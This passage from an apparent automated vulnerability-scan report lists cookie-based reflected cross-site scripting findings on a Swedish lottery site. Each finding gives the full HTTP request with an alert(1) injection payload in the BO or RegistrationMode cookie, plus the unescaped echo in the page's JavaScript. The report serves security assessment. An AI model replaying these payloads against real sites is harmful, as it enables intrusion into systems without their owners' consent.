User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMbbe0e"-alert(1)-"725dc4c31b8; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: BO=FMbbe0e"-alert(1)-"725dc4c31b8; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbbe0e"-alert(1)-"725dc4c31b8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.437. http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62361"-alert(1)-"d85c95de549 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM62361"-alert(1)-"d85c95de549; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM62361"-alert(1)-"d85c95de549; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM62361"-alert(1)-"d85c95de549";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.438. http://www.svenskalotter.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1cf0"-alert(1)-"b6fe61c9a03 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb1cf0"-alert(1)-"b6fe61c9a03; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FMb1cf0"-alert(1)-"b6fe61c9a03; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb1cf0"-alert(1)-"b6fe61c9a03";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.439. http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8c3"-alert(1)-"e44d0177189 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMfe8c3"-alert(1)-"e44d0177189; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMfe8c3"-alert(1)-"e44d0177189; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMfe8c3"-alert(1)-"e44d0177189";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.440. http://www.svenskalotter.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bde2"-alert(1)-"2b88f66f761 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM3bde2"-alert(1)-"2b88f66f761; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM3bde2"-alert(1)-"2b88f66f761; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3bde2"-alert(1)-"2b88f66f761";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.441. http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcc1"-alert(1)-"8c7f3bcf826 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM4bcc1"-alert(1)-"8c7f3bcf826; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4bcc1"-alert(1)-"8c7f3bcf826; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4bcc1"-alert(1)-"8c7f3bcf826";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.442. http://www.svenskalotter.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b012a"-alert(1)-"34350330c2c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb012a"-alert(1)-"34350330c2c; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FMb012a"-alert(1)-"34350330c2c; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb012a"-alert(1)-"34350330c2c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.443. http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef139"-alert(1)-"7f9238ea0e5 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMef139"-alert(1)-"7f9238ea0e5; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMef139"-alert(1)-"7f9238ea0e5; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMef139"-alert(1)-"7f9238ea0e5";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.444. http://www.svenskalotter.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dedde"-alert(1)-"ae918ea2a0e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMdedde"-alert(1)-"ae918ea2a0e; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: BO=FMdedde"-alert(1)-"ae918ea2a0e; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdedde"-alert(1)-"ae918ea2a0e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.445. http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd889"-alert(1)-"ffa9dbb0130 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbd889"-alert(1)-"ffa9dbb0130; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbd889"-alert(1)-"ffa9dbb0130; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbd889"-alert(1)-"ffa9dbb0130";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.446. http://www.svenskalotter.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd471"-alert(1)-"bd1152df0ff was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
